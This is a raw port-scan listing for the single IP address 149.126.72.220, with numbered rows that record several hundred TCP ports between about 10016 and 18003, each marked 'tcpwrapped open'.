6875149.126.72.220 10016 tcp tcpwrapped open
6876149.126.72.220 10017 tcp tcpwrapped open
6877149.126.72.220 10018 tcp tcpwrapped open
6878149.126.72.220 10019 tcp tcpwrapped open
6879149.126.72.220 10020 tcp tcpwrapped open
6880149.126.72.220 10021 tcp tcpwrapped open
6881149.126.72.220 10022 tcp tcpwrapped open
6882149.126.72.220 10023 tcp tcpwrapped open
6883149.126.72.220 10024 tcp tcpwrapped open
6884149.126.72.220 10025 tcp tcpwrapped open
6885149.126.72.220 10026 tcp tcpwrapped open
6886149.126.72.220 10027 tcp tcpwrapped open
6887149.126.72.220 10028 tcp tcpwrapped open
6888149.126.72.220 10029 tcp tcpwrapped open
6889149.126.72.220 10030 tcp tcpwrapped open
6890149.126.72.220 10031 tcp tcpwrapped open
6891149.126.72.220 10032 tcp tcpwrapped open
6892149.126.72.220 10033 tcp tcpwrapped open
6893149.126.72.220 10034 tcp tcpwrapped open
6894149.126.72.220 10035 tcp tcpwrapped open
6895149.126.72.220 10036 tcp tcpwrapped open
6896149.126.72.220 10037 tcp tcpwrapped open
6897149.126.72.220 10038 tcp tcpwrapped open
6898149.126.72.220 10039 tcp tcpwrapped open
6899149.126.72.220 10040 tcp tcpwrapped open
6900149.126.72.220 10041 tcp tcpwrapped open
6901149.126.72.220 10042 tcp tcpwrapped open
6902149.126.72.220 10043 tcp tcpwrapped open
6903149.126.72.220 10044 tcp tcpwrapped open
6904149.126.72.220 10045 tcp tcpwrapped open
6905149.126.72.220 10046 tcp tcpwrapped open
6906149.126.72.220 10047 tcp tcpwrapped open
6907149.126.72.220 10048 tcp tcpwrapped open
6908149.126.72.220 10049 tcp tcpwrapped open
6909149.126.72.220 10065 tcp tcpwrapped open
6910149.126.72.220 10071 tcp tcpwrapped open
6911149.126.72.220 10075 tcp tcpwrapped open
6912149.126.72.220 10082 tcp tcpwrapped open
6913149.126.72.220 10084 tcp tcpwrapped open
6914149.126.72.220 10100 tcp tcpwrapped open
6915149.126.72.220 10123 tcp tcpwrapped open
6916149.126.72.220 10200 tcp tcpwrapped open
6917149.126.72.220 10443 tcp tcpwrapped open
6918149.126.72.220 10444 tcp tcpwrapped open
6919149.126.72.220 10892 tcp tcpwrapped open
6920149.126.72.220 10894 tcp tcpwrapped open
6921149.126.72.220 11001 tcp tcpwrapped open
6922149.126.72.220 11002 tcp tcpwrapped open
6923149.126.72.220 11007 tcp tcpwrapped open
6924149.126.72.220 11027 tcp tcpwrapped open
6925149.126.72.220 11065 tcp tcpwrapped open
6926149.126.72.220 11075 tcp tcpwrapped open
6927149.126.72.220 11082 tcp tcpwrapped open
6928149.126.72.220 11084 tcp tcpwrapped open
6929149.126.72.220 11110 tcp tcpwrapped open
6930149.126.72.220 11182 tcp tcpwrapped open
6931149.126.72.220 11184 tcp tcpwrapped open
6932149.126.72.220 11443 tcp tcpwrapped open
6933149.126.72.220 12016 tcp tcpwrapped open
6934149.126.72.220 12082 tcp tcpwrapped open
6935149.126.72.220 12084 tcp tcpwrapped open
6936149.126.72.220 12103 tcp tcpwrapped open
6937149.126.72.220 12104 tcp tcpwrapped open
6938149.126.72.220 12105 tcp tcpwrapped open
6939149.126.72.220 12106 tcp tcpwrapped open
6940149.126.72.220 12107 tcp tcpwrapped open
6941149.126.72.220 12108 tcp tcpwrapped open
6942149.126.72.220 12109 tcp tcpwrapped open
6943149.126.72.220 12110 tcp tcpwrapped open
6944149.126.72.220 12111 tcp tcpwrapped open
6945149.126.72.220 12112 tcp tcpwrapped open
6946149.126.72.220 12113 tcp tcpwrapped open
6947149.126.72.220 12114 tcp tcpwrapped open
6948149.126.72.220 12115 tcp tcpwrapped open
6949149.126.72.220 12116 tcp tcpwrapped open
6950149.126.72.220 12117 tcp tcpwrapped open
6951149.126.72.220 12118 tcp tcpwrapped open
6952149.126.72.220 12119 tcp tcpwrapped open
6953149.126.72.220 12120 tcp tcpwrapped open
6954149.126.72.220 12121 tcp tcpwrapped open
6955149.126.72.220 12122 tcp tcpwrapped open
6956149.126.72.220 12123 tcp tcpwrapped open
6957149.126.72.220 12124 tcp tcpwrapped open
6958149.126.72.220 12125 tcp tcpwrapped open
6959149.126.72.220 12126 tcp tcpwrapped open
6960149.126.72.220 12127 tcp tcpwrapped open
6961149.126.72.220 12128 tcp tcpwrapped open
6962149.126.72.220 12129 tcp tcpwrapped open
6963149.126.72.220 12130 tcp tcpwrapped open
6964149.126.72.220 12131 tcp tcpwrapped open
6965149.126.72.220 12132 tcp tcpwrapped open
6966149.126.72.220 12133 tcp tcpwrapped open
6967149.126.72.220 12134 tcp tcpwrapped open
6968149.126.72.220 12135 tcp tcpwrapped open
6969149.126.72.220 12136 tcp tcpwrapped open
6970149.126.72.220 12137 tcp tcpwrapped open
6971149.126.72.220 12138 tcp tcpwrapped open
6972149.126.72.220 12139 tcp tcpwrapped open
6973149.126.72.220 12140 tcp tcpwrapped open
6974149.126.72.220 12141 tcp tcpwrapped open
6975149.126.72.220 12142 tcp tcpwrapped open
6976149.126.72.220 12143 tcp tcpwrapped open
6977149.126.72.220 12144 tcp tcpwrapped open
6978149.126.72.220 12145 tcp tcpwrapped open
6979149.126.72.220 12146 tcp tcpwrapped open
6980149.126.72.220 12147 tcp tcpwrapped open
6981149.126.72.220 12148 tcp tcpwrapped open
6982149.126.72.220 12149 tcp tcpwrapped open
6983149.126.72.220 12150 tcp tcpwrapped open
6984149.126.72.220 12151 tcp tcpwrapped open
6985149.126.72.220 12152 tcp tcpwrapped open
6986149.126.72.220 12153 tcp tcpwrapped open
6987149.126.72.220 12154 tcp tcpwrapped open
6988149.126.72.220 12155 tcp tcpwrapped open
6989149.126.72.220 12156 tcp tcpwrapped open
6990149.126.72.220 12157 tcp tcpwrapped open
6991149.126.72.220 12158 tcp tcpwrapped open
6992149.126.72.220 12159 tcp tcpwrapped open
6993149.126.72.220 12160 tcp tcpwrapped open
6994149.126.72.220 12161 tcp tcpwrapped open
6995149.126.72.220 12162 tcp tcpwrapped open
6996149.126.72.220 12163 tcp tcpwrapped open
6997149.126.72.220 12164 tcp tcpwrapped open
6998149.126.72.220 12165 tcp tcpwrapped open
6999149.126.72.220 12166 tcp tcpwrapped open
7000149.126.72.220 12167 tcp tcpwrapped open
7001149.126.72.220 12168 tcp tcpwrapped open
7002149.126.72.220 12169 tcp tcpwrapped open
7003149.126.72.220 12170 tcp tcpwrapped open
7004149.126.72.220 12171 tcp tcpwrapped open
7005149.126.72.220 12172 tcp tcpwrapped open
7006149.126.72.220 12173 tcp tcpwrapped open
7007149.126.72.220 12174 tcp tcpwrapped open
7008149.126.72.220 12175 tcp tcpwrapped open
7009149.126.72.220 12176 tcp tcpwrapped open
7010149.126.72.220 12177 tcp tcpwrapped open
7011149.126.72.220 12178 tcp tcpwrapped open
7012149.126.72.220 12179 tcp tcpwrapped open
7013149.126.72.220 12180 tcp tcpwrapped open
7014149.126.72.220 12181 tcp tcpwrapped open
7015149.126.72.220 12182 tcp tcpwrapped open
7016149.126.72.220 12183 tcp tcpwrapped open
7017149.126.72.220 12184 tcp tcpwrapped open
7018149.126.72.220 12185 tcp tcpwrapped open
7019149.126.72.220 12186 tcp tcpwrapped open
7020149.126.72.220 12187 tcp tcpwrapped open
7021149.126.72.220 12188 tcp tcpwrapped open
7022149.126.72.220 12189 tcp tcpwrapped open
7023149.126.72.220 12190 tcp tcpwrapped open
7024149.126.72.220 12191 tcp tcpwrapped open
7025149.126.72.220 12192 tcp tcpwrapped open
7026149.126.72.220 12193 tcp tcpwrapped open
7027149.126.72.220 12194 tcp tcpwrapped open
7028149.126.72.220 12195 tcp tcpwrapped open
7029149.126.72.220 12196 tcp tcpwrapped open
7030149.126.72.220 12197 tcp tcpwrapped open
7031149.126.72.220 12198 tcp tcpwrapped open
7032149.126.72.220 12199 tcp tcpwrapped open
7033149.126.72.220 12200 tcp tcpwrapped open
7034149.126.72.220 12201 tcp tcpwrapped open
7035149.126.72.220 12202 tcp tcpwrapped open
7036149.126.72.220 12203 tcp tcpwrapped open
7037149.126.72.220 12204 tcp tcpwrapped open
7038149.126.72.220 12205 tcp tcpwrapped open
7039149.126.72.220 12206 tcp tcpwrapped open
7040149.126.72.220 12207 tcp tcpwrapped open
7041149.126.72.220 12208 tcp tcpwrapped open
7042149.126.72.220 12209 tcp tcpwrapped open
7043149.126.72.220 12210 tcp tcpwrapped open
7044149.126.72.220 12211 tcp tcpwrapped open
7045149.126.72.220 12212 tcp tcpwrapped open
7046149.126.72.220 12213 tcp tcpwrapped open
7047149.126.72.220 12214 tcp tcpwrapped open
7048149.126.72.220 12215 tcp tcpwrapped open
7049149.126.72.220 12216 tcp tcpwrapped open
7050149.126.72.220 12217 tcp tcpwrapped open
7051149.126.72.220 12218 tcp tcpwrapped open
7052149.126.72.220 12219 tcp tcpwrapped open
7053149.126.72.220 12220 tcp tcpwrapped open
7054149.126.72.220 12221 tcp tcpwrapped open
7055149.126.72.220 12222 tcp tcpwrapped open
7056149.126.72.220 12223 tcp tcpwrapped open
7057149.126.72.220 12224 tcp tcpwrapped open
7058149.126.72.220 12225 tcp tcpwrapped open
7059149.126.72.220 12226 tcp tcpwrapped open
7060149.126.72.220 12227 tcp tcpwrapped open
7061149.126.72.220 12228 tcp tcpwrapped open
7062149.126.72.220 12229 tcp tcpwrapped open
7063149.126.72.220 12230 tcp tcpwrapped open
7064149.126.72.220 12231 tcp tcpwrapped open
7065149.126.72.220 12232 tcp tcpwrapped open
7066149.126.72.220 12233 tcp tcpwrapped open
7067149.126.72.220 12234 tcp tcpwrapped open
7068149.126.72.220 12235 tcp tcpwrapped open
7069149.126.72.220 12236 tcp tcpwrapped open
7070149.126.72.220 12237 tcp tcpwrapped open
7071149.126.72.220 12238 tcp tcpwrapped open
7072149.126.72.220 12239 tcp tcpwrapped open
7073149.126.72.220 12240 tcp tcpwrapped open
7074149.126.72.220 12241 tcp tcpwrapped open
7075149.126.72.220 12242 tcp tcpwrapped open
7076149.126.72.220 12243 tcp tcpwrapped open
7077149.126.72.220 12244 tcp tcpwrapped open
7078149.126.72.220 12245 tcp tcpwrapped open
7079149.126.72.220 12246 tcp tcpwrapped open
7080149.126.72.220 12247 tcp tcpwrapped open
7081149.126.72.220 12248 tcp tcpwrapped open
7082149.126.72.220 12249 tcp tcpwrapped open
7083149.126.72.220 12250 tcp tcpwrapped open
7084149.126.72.220 12251 tcp tcpwrapped open
7085149.126.72.220 12252 tcp tcpwrapped open
7086149.126.72.220 12253 tcp tcpwrapped open
7087149.126.72.220 12254 tcp tcpwrapped open
7088149.126.72.220 12255 tcp tcpwrapped open
7089149.126.72.220 12256 tcp tcpwrapped open
7090149.126.72.220 12257 tcp tcpwrapped open
7091149.126.72.220 12258 tcp tcpwrapped open
7092149.126.72.220 12259 tcp tcpwrapped open
7093149.126.72.220 12260 tcp tcpwrapped open
7094149.126.72.220 12261 tcp tcpwrapped open
7095149.126.72.220 12262 tcp tcpwrapped open
7096149.126.72.220 12263 tcp tcpwrapped open
7097149.126.72.220 12264 tcp tcpwrapped open
7098149.126.72.220 12265 tcp tcpwrapped open
7099149.126.72.220 12266 tcp tcpwrapped open
7100149.126.72.220 12267 tcp tcpwrapped open
7101149.126.72.220 12268 tcp tcpwrapped open
7102149.126.72.220 12269 tcp tcpwrapped open
7103149.126.72.220 12270 tcp tcpwrapped open
7104149.126.72.220 12271 tcp tcpwrapped open
7105149.126.72.220 12272 tcp tcpwrapped open
7106149.126.72.220 12273 tcp tcpwrapped open
7107149.126.72.220 12274 tcp tcpwrapped open
7108149.126.72.220 12275 tcp tcpwrapped open
7109149.126.72.220 12276 tcp tcpwrapped open
7110149.126.72.220 12277 tcp tcpwrapped open
7111149.126.72.220 12278 tcp tcpwrapped open
7112149.126.72.220 12279 tcp tcpwrapped open
7113149.126.72.220 12280 tcp tcpwrapped open
7114149.126.72.220 12281 tcp tcpwrapped open
7115149.126.72.220 12282 tcp tcpwrapped open
7116149.126.72.220 12283 tcp tcpwrapped open
7117149.126.72.220 12284 tcp tcpwrapped open
7118149.126.72.220 12285 tcp tcpwrapped open
7119149.126.72.220 12286 tcp tcpwrapped open
7120149.126.72.220 12287 tcp tcpwrapped open
7121149.126.72.220 12288 tcp tcpwrapped open
7122149.126.72.220 12289 tcp tcpwrapped open
7123149.126.72.220 12290 tcp tcpwrapped open
7124149.126.72.220 12291 tcp tcpwrapped open
7125149.126.72.220 12292 tcp tcpwrapped open
7126149.126.72.220 12293 tcp tcpwrapped open
7127149.126.72.220 12294 tcp tcpwrapped open
7128149.126.72.220 12295 tcp tcpwrapped open
7129149.126.72.220 12296 tcp tcpwrapped open
7130149.126.72.220 12297 tcp tcpwrapped open
7131149.126.72.220 12298 tcp tcpwrapped open
7132149.126.72.220 12299 tcp tcpwrapped open
7133149.126.72.220 12300 tcp tcpwrapped open
7134149.126.72.220 12301 tcp tcpwrapped open
7135149.126.72.220 12302 tcp tcpwrapped open
7136149.126.72.220 12303 tcp tcpwrapped open
7137149.126.72.220 12304 tcp tcpwrapped open
7138149.126.72.220 12305 tcp tcpwrapped open
7139149.126.72.220 12306 tcp tcpwrapped open
7140149.126.72.220 12307 tcp tcpwrapped open
7141149.126.72.220 12308 tcp tcpwrapped open
7142149.126.72.220 12309 tcp tcpwrapped open
7143149.126.72.220 12310 tcp tcpwrapped open
7144149.126.72.220 12311 tcp tcpwrapped open
7145149.126.72.220 12312 tcp tcpwrapped open
7146149.126.72.220 12313 tcp tcpwrapped open
7147149.126.72.220 12314 tcp tcpwrapped open
7148149.126.72.220 12315 tcp tcpwrapped open
7149149.126.72.220 12316 tcp tcpwrapped open
7150149.126.72.220 12317 tcp tcpwrapped open
7151149.126.72.220 12318 tcp tcpwrapped open
7152149.126.72.220 12319 tcp tcpwrapped open
7153149.126.72.220 12320 tcp tcpwrapped open
7154149.126.72.220 12321 tcp tcpwrapped open
7155149.126.72.220 12322 tcp tcpwrapped open
7156149.126.72.220 12323 tcp tcpwrapped open
7157149.126.72.220 12324 tcp tcpwrapped open
7158149.126.72.220 12325 tcp tcpwrapped open
7159149.126.72.220 12326 tcp tcpwrapped open
7160149.126.72.220 12327 tcp tcpwrapped open
7161149.126.72.220 12328 tcp tcpwrapped open
7162149.126.72.220 12329 tcp tcpwrapped open
7163149.126.72.220 12330 tcp tcpwrapped open
7164149.126.72.220 12331 tcp tcpwrapped open
7165149.126.72.220 12332 tcp tcpwrapped open
7166149.126.72.220 12333 tcp tcpwrapped open
7167149.126.72.220 12334 tcp tcpwrapped open
7168149.126.72.220 12335 tcp tcpwrapped open
7169149.126.72.220 12336 tcp tcpwrapped open
7170149.126.72.220 12337 tcp tcpwrapped open
7171149.126.72.220 12338 tcp tcpwrapped open
7172149.126.72.220 12339 tcp tcpwrapped open
7173149.126.72.220 12340 tcp tcpwrapped open
7174149.126.72.220 12341 tcp tcpwrapped open
7175149.126.72.220 12342 tcp tcpwrapped open
7176149.126.72.220 12343 tcp tcpwrapped open
7177149.126.72.220 12344 tcp tcpwrapped open
7178149.126.72.220 12345 tcp tcpwrapped open
7179149.126.72.220 12346 tcp tcpwrapped open
7180149.126.72.220 12347 tcp tcpwrapped open
7181149.126.72.220 12348 tcp tcpwrapped open
7182149.126.72.220 12349 tcp tcpwrapped open
7183149.126.72.220 12350 tcp tcpwrapped open
7184149.126.72.220 12351 tcp tcpwrapped open
7185149.126.72.220 12352 tcp tcpwrapped open
7186149.126.72.220 12353 tcp tcpwrapped open
7187149.126.72.220 12354 tcp tcpwrapped open
7188149.126.72.220 12355 tcp tcpwrapped open
7189149.126.72.220 12356 tcp tcpwrapped open
7190149.126.72.220 12357 tcp tcpwrapped open
7191149.126.72.220 12358 tcp tcpwrapped open
7192149.126.72.220 12359 tcp tcpwrapped open
7193149.126.72.220 12360 tcp tcpwrapped open
7194149.126.72.220 12361 tcp tcpwrapped open
7195149.126.72.220 12362 tcp tcpwrapped open
7196149.126.72.220 12363 tcp tcpwrapped open
7197149.126.72.220 12364 tcp tcpwrapped open
7198149.126.72.220 12365 tcp tcpwrapped open
7199149.126.72.220 12366 tcp tcpwrapped open
7200149.126.72.220 12367 tcp tcpwrapped open
7201149.126.72.220 12368 tcp tcpwrapped open
7202149.126.72.220 12369 tcp tcpwrapped open
7203149.126.72.220 12370 tcp tcpwrapped open
7204149.126.72.220 12371 tcp tcpwrapped open
7205149.126.72.220 12372 tcp tcpwrapped open
7206149.126.72.220 12373 tcp tcpwrapped open
7207149.126.72.220 12374 tcp tcpwrapped open
7208149.126.72.220 12375 tcp tcpwrapped open
7209149.126.72.220 12376 tcp tcpwrapped open
7210149.126.72.220 12377 tcp tcpwrapped open
7211149.126.72.220 12378 tcp tcpwrapped open
7212149.126.72.220 12379 tcp tcpwrapped open
7213149.126.72.220 12380 tcp tcpwrapped open
7214149.126.72.220 12381 tcp tcpwrapped open
7215149.126.72.220 12382 tcp tcpwrapped open
7216149.126.72.220 12383 tcp tcpwrapped open
7217149.126.72.220 12384 tcp tcpwrapped open
7218149.126.72.220 12385 tcp tcpwrapped open
7219149.126.72.220 12386 tcp tcpwrapped open
7220149.126.72.220 12387 tcp tcpwrapped open
7221149.126.72.220 12388 tcp tcpwrapped open
7222149.126.72.220 12389 tcp tcpwrapped open
7223149.126.72.220 12390 tcp tcpwrapped open
7224149.126.72.220 12391 tcp tcpwrapped open
7225149.126.72.220 12392 tcp tcpwrapped open
7226149.126.72.220 12393 tcp tcpwrapped open
7227149.126.72.220 12394 tcp tcpwrapped open
7228149.126.72.220 12395 tcp tcpwrapped open
7229149.126.72.220 12396 tcp tcpwrapped open
7230149.126.72.220 12397 tcp tcpwrapped open
7231149.126.72.220 12398 tcp tcpwrapped open
7232149.126.72.220 12399 tcp tcpwrapped open
7233149.126.72.220 12400 tcp tcpwrapped open
7234149.126.72.220 12401 tcp tcpwrapped open
7235149.126.72.220 12402 tcp tcpwrapped open
7236149.126.72.220 12403 tcp tcpwrapped open
7237149.126.72.220 12404 tcp tcpwrapped open
7238149.126.72.220 12405 tcp tcpwrapped open
7239149.126.72.220 12406 tcp tcpwrapped open
7240149.126.72.220 12407 tcp tcpwrapped open
7241149.126.72.220 12408 tcp tcpwrapped open
7242149.126.72.220 12409 tcp tcpwrapped open
7243149.126.72.220 12410 tcp tcpwrapped open
7244149.126.72.220 12411 tcp tcpwrapped open
7245149.126.72.220 12412 tcp tcpwrapped open
7246149.126.72.220 12413 tcp tcpwrapped open
7247149.126.72.220 12414 tcp tcpwrapped open
7248149.126.72.220 12415 tcp tcpwrapped open
7249149.126.72.220 12416 tcp tcpwrapped open
7250149.126.72.220 12417 tcp tcpwrapped open
7251149.126.72.220 12418 tcp tcpwrapped open
7252149.126.72.220 12419 tcp tcpwrapped open
7253149.126.72.220 12420 tcp tcpwrapped open
7254149.126.72.220 12421 tcp tcpwrapped open
7255149.126.72.220 12422 tcp tcpwrapped open
7256149.126.72.220 12423 tcp tcpwrapped open
7257149.126.72.220 12424 tcp tcpwrapped open
7258149.126.72.220 12425 tcp tcpwrapped open
7259149.126.72.220 12426 tcp tcpwrapped open
7260149.126.72.220 12427 tcp tcpwrapped open
7261149.126.72.220 12428 tcp tcpwrapped open
7262149.126.72.220 12429 tcp tcpwrapped open
7263149.126.72.220 12430 tcp tcpwrapped open
7264149.126.72.220 12431 tcp tcpwrapped open
7265149.126.72.220 12432 tcp tcpwrapped open
7266149.126.72.220 12433 tcp tcpwrapped open
7267149.126.72.220 12434 tcp tcpwrapped open
7268149.126.72.220 12435 tcp tcpwrapped open
7269149.126.72.220 12436 tcp tcpwrapped open
7270149.126.72.220 12437 tcp tcpwrapped open
7271149.126.72.220 12438 tcp tcpwrapped open
7272149.126.72.220 12439 tcp tcpwrapped open
7273149.126.72.220 12440 tcp tcpwrapped open
7274149.126.72.220 12441 tcp tcpwrapped open
7275149.126.72.220 12442 tcp tcpwrapped open
7276149.126.72.220 12443 tcp tcpwrapped open
7277149.126.72.220 12444 tcp tcpwrapped open
7278149.126.72.220 12445 tcp tcpwrapped open
7279149.126.72.220 12446 tcp tcpwrapped open
7280149.126.72.220 12447 tcp tcpwrapped open
7281149.126.72.220 12448 tcp tcpwrapped open
7282149.126.72.220 12449 tcp tcpwrapped open
7283149.126.72.220 12450 tcp tcpwrapped open
7284149.126.72.220 12451 tcp tcpwrapped open
7285149.126.72.220 12452 tcp tcpwrapped open
7286149.126.72.220 12453 tcp tcpwrapped open
7287149.126.72.220 12454 tcp tcpwrapped open
7288149.126.72.220 12455 tcp tcpwrapped open
7289149.126.72.220 12456 tcp tcpwrapped open
7290149.126.72.220 12457 tcp tcpwrapped open
7291149.126.72.220 12458 tcp tcpwrapped open
7292149.126.72.220 12459 tcp tcpwrapped open
7293149.126.72.220 12460 tcp tcpwrapped open
7294149.126.72.220 12461 tcp tcpwrapped open
7295149.126.72.220 12462 tcp tcpwrapped open
7296149.126.72.220 12463 tcp tcpwrapped open
7297149.126.72.220 12464 tcp tcpwrapped open
7298149.126.72.220 12465 tcp tcpwrapped open
7299149.126.72.220 12466 tcp tcpwrapped open
7300149.126.72.220 12467 tcp tcpwrapped open
7301149.126.72.220 12468 tcp tcpwrapped open
7302149.126.72.220 12469 tcp tcpwrapped open
7303149.126.72.220 12470 tcp tcpwrapped open
7304149.126.72.220 12471 tcp tcpwrapped open
7305149.126.72.220 12472 tcp tcpwrapped open
7306149.126.72.220 12473 tcp tcpwrapped open
7307149.126.72.220 12474 tcp tcpwrapped open
7308149.126.72.220 12475 tcp tcpwrapped open
7309149.126.72.220 12476 tcp tcpwrapped open
7310149.126.72.220 12477 tcp tcpwrapped open
7311149.126.72.220 12478 tcp tcpwrapped open
7312149.126.72.220 12479 tcp tcpwrapped open
7313149.126.72.220 12480 tcp tcpwrapped open
7314149.126.72.220 12481 tcp tcpwrapped open
7315149.126.72.220 12482 tcp tcpwrapped open
7316149.126.72.220 12483 tcp tcpwrapped open
7317149.126.72.220 12484 tcp tcpwrapped open
7318149.126.72.220 12485 tcp tcpwrapped open
7319149.126.72.220 12486 tcp tcpwrapped open
7320149.126.72.220 12487 tcp tcpwrapped open
7321149.126.72.220 12488 tcp tcpwrapped open
7322149.126.72.220 12489 tcp tcpwrapped open
7323149.126.72.220 12490 tcp tcpwrapped open
7324149.126.72.220 12491 tcp tcpwrapped open
7325149.126.72.220 12492 tcp tcpwrapped open
7326149.126.72.220 12493 tcp tcpwrapped open
7327149.126.72.220 12494 tcp tcpwrapped open
7328149.126.72.220 12495 tcp tcpwrapped open
7329149.126.72.220 12496 tcp tcpwrapped open
7330149.126.72.220 12497 tcp tcpwrapped open
7331149.126.72.220 12498 tcp tcpwrapped open
7332149.126.72.220 12499 tcp tcpwrapped open
7333149.126.72.220 12500 tcp tcpwrapped open
7334149.126.72.220 12501 tcp tcpwrapped open
7335149.126.72.220 12502 tcp tcpwrapped open
7336149.126.72.220 12503 tcp tcpwrapped open
7337149.126.72.220 12504 tcp tcpwrapped open
7338149.126.72.220 12505 tcp tcpwrapped open
7339149.126.72.220 12506 tcp tcpwrapped open
7340149.126.72.220 12507 tcp tcpwrapped open
7341149.126.72.220 12508 tcp tcpwrapped open
7342149.126.72.220 12509 tcp tcpwrapped open
7343149.126.72.220 12510 tcp tcpwrapped open
7344149.126.72.220 12511 tcp tcpwrapped open
7345149.126.72.220 12512 tcp tcpwrapped open
7346149.126.72.220 12513 tcp tcpwrapped open
7347149.126.72.220 12514 tcp tcpwrapped open
7348149.126.72.220 12515 tcp tcpwrapped open
7349149.126.72.220 12516 tcp tcpwrapped open
7350149.126.72.220 12517 tcp tcpwrapped open
7351149.126.72.220 12518 tcp tcpwrapped open
7352149.126.72.220 12519 tcp tcpwrapped open
7353149.126.72.220 12520 tcp tcpwrapped open
7354149.126.72.220 12521 tcp tcpwrapped open
7355149.126.72.220 12522 tcp tcpwrapped open
7356149.126.72.220 12523 tcp tcpwrapped open
7357149.126.72.220 12524 tcp tcpwrapped open
7358149.126.72.220 12525 tcp tcpwrapped open
7359149.126.72.220 12526 tcp tcpwrapped open
7360149.126.72.220 12527 tcp tcpwrapped open
7361149.126.72.220 12528 tcp tcpwrapped open
7362149.126.72.220 12529 tcp tcpwrapped open
7363149.126.72.220 12530 tcp tcpwrapped open
7364149.126.72.220 12531 tcp tcpwrapped open
7365149.126.72.220 12532 tcp tcpwrapped open
7366149.126.72.220 12533 tcp tcpwrapped open
7367149.126.72.220 12534 tcp tcpwrapped open
7368149.126.72.220 12535 tcp tcpwrapped open
7369149.126.72.220 12536 tcp tcpwrapped open
7370149.126.72.220 12537 tcp tcpwrapped open
7371149.126.72.220 12538 tcp tcpwrapped open
7372149.126.72.220 12539 tcp tcpwrapped open
7373149.126.72.220 12540 tcp tcpwrapped open
7374149.126.72.220 12541 tcp tcpwrapped open
7375149.126.72.220 12542 tcp tcpwrapped open
7376149.126.72.220 12543 tcp tcpwrapped open
7377149.126.72.220 12544 tcp tcpwrapped open
7378149.126.72.220 12545 tcp tcpwrapped open
7379149.126.72.220 12546 tcp tcpwrapped open
7380149.126.72.220 12547 tcp tcpwrapped open
7381149.126.72.220 12548 tcp tcpwrapped open
7382149.126.72.220 12549 tcp tcpwrapped open
7383149.126.72.220 12550 tcp tcpwrapped open
7384149.126.72.220 12551 tcp tcpwrapped open
7385149.126.72.220 12552 tcp tcpwrapped open
7386149.126.72.220 12553 tcp tcpwrapped open
7387149.126.72.220 12554 tcp tcpwrapped open
7388149.126.72.220 12555 tcp tcpwrapped open
7389149.126.72.220 12556 tcp tcpwrapped open
7390149.126.72.220 12557 tcp tcpwrapped open
7391149.126.72.220 12558 tcp tcpwrapped open
7392149.126.72.220 12559 tcp tcpwrapped open
7393149.126.72.220 12560 tcp tcpwrapped open
7394149.126.72.220 12561 tcp tcpwrapped open
7395149.126.72.220 12562 tcp tcpwrapped open
7396149.126.72.220 12563 tcp tcpwrapped open
7397149.126.72.220 12564 tcp tcpwrapped open
7398149.126.72.220 12565 tcp tcpwrapped open
7399149.126.72.220 12566 tcp tcpwrapped open
7400149.126.72.220 12567 tcp tcpwrapped open
7401149.126.72.220 12568 tcp tcpwrapped open
7402149.126.72.220 12569 tcp tcpwrapped open
7403149.126.72.220 12570 tcp tcpwrapped open
7404149.126.72.220 12571 tcp tcpwrapped open
7405149.126.72.220 12572 tcp tcpwrapped open
7406149.126.72.220 12573 tcp tcpwrapped open
7407149.126.72.220 12574 tcp tcpwrapped open
7408149.126.72.220 12575 tcp tcpwrapped open
7409149.126.72.220 12576 tcp tcpwrapped open
7410149.126.72.220 12577 tcp tcpwrapped open
7411149.126.72.220 12578 tcp tcpwrapped open
7412149.126.72.220 12579 tcp tcpwrapped open
7413149.126.72.220 12580 tcp tcpwrapped open
7414149.126.72.220 12581 tcp tcpwrapped open
7415149.126.72.220 12582 tcp tcpwrapped open
7416149.126.72.220 12583 tcp tcpwrapped open
7417149.126.72.220 12584 tcp tcpwrapped open
7418149.126.72.220 12585 tcp tcpwrapped open
7419149.126.72.220 12586 tcp tcpwrapped open
7420149.126.72.220 12587 tcp tcpwrapped open
7421149.126.72.220 12588 tcp tcpwrapped open
7422149.126.72.220 12589 tcp tcpwrapped open
7423149.126.72.220 12590 tcp tcpwrapped open
7424149.126.72.220 13082 tcp tcpwrapped open
7425149.126.72.220 13084 tcp tcpwrapped open
7426149.126.72.220 13333 tcp tcpwrapped open
7427149.126.72.220 13443 tcp tcpwrapped open
7428149.126.72.220 14006 tcp tcpwrapped open
7429149.126.72.220 14082 tcp tcpwrapped open
7430149.126.72.220 14084 tcp tcpwrapped open
7431149.126.72.220 14104 tcp tcpwrapped open
7432149.126.72.220 14130 tcp tcpwrapped open
7433149.126.72.220 14182 tcp tcpwrapped open
7434149.126.72.220 14184 tcp tcpwrapped open
7435149.126.72.220 14330 tcp tcpwrapped open
7436149.126.72.220 14443 tcp tcpwrapped open
7437149.126.72.220 14825 tcp tcpwrapped open
7438149.126.72.220 15002 tcp tcpwrapped open
7439149.126.72.220 15006 tcp tcpwrapped open
7440149.126.72.220 15082 tcp tcpwrapped open
7441149.126.72.220 15084 tcp tcpwrapped open
7442149.126.72.220 15151 tcp tcpwrapped open
7443149.126.72.220 15555 tcp tcpwrapped open
7444149.126.72.220 16000 tcp tcpwrapped open
7445149.126.72.220 16001 tcp tcpwrapped open
7446149.126.72.220 16015 tcp tcpwrapped open
7447149.126.72.220 16016 tcp tcpwrapped open
7448149.126.72.220 16017 tcp tcpwrapped open
7449149.126.72.220 16082 tcp tcpwrapped open
7450149.126.72.220 16084 tcp tcpwrapped open
7451149.126.72.220 16311 tcp tcpwrapped open
7452149.126.72.220 16316 tcp tcpwrapped open
7453149.126.72.220 16443 tcp tcpwrapped open
7454149.126.72.220 16800 tcp tcpwrapped open
7455149.126.72.220 16888 tcp tcpwrapped open
7456149.126.72.220 17082 tcp tcpwrapped open
7457149.126.72.220 17084 tcp tcpwrapped open
7458149.126.72.220 17182 tcp tcpwrapped open
7459149.126.72.220 17184 tcp tcpwrapped open
7460149.126.72.220 17770 tcp tcpwrapped open
7461149.126.72.220 17771 tcp tcpwrapped open
7462149.126.72.220 17772 tcp tcpwrapped open
7463149.126.72.220 17773 tcp tcpwrapped open
7464149.126.72.220 17774 tcp tcpwrapped open
7465149.126.72.220 17775 tcp tcpwrapped open
7466149.126.72.220 17776 tcp tcpwrapped open
7467149.126.72.220 17777 tcp tcpwrapped open
7468149.126.72.220 17778 tcp tcpwrapped open
7469149.126.72.220 17779 tcp tcpwrapped open
7470149.126.72.220 17780 tcp tcpwrapped open
7471149.126.72.220 18000 tcp tcpwrapped open
7472149.126.72.220 18001 tcp tcpwrapped open
7473149.126.72.220 18002 tcp tcpwrapped open
7474149.126.72.220 18003 tcp tcpwrapped open
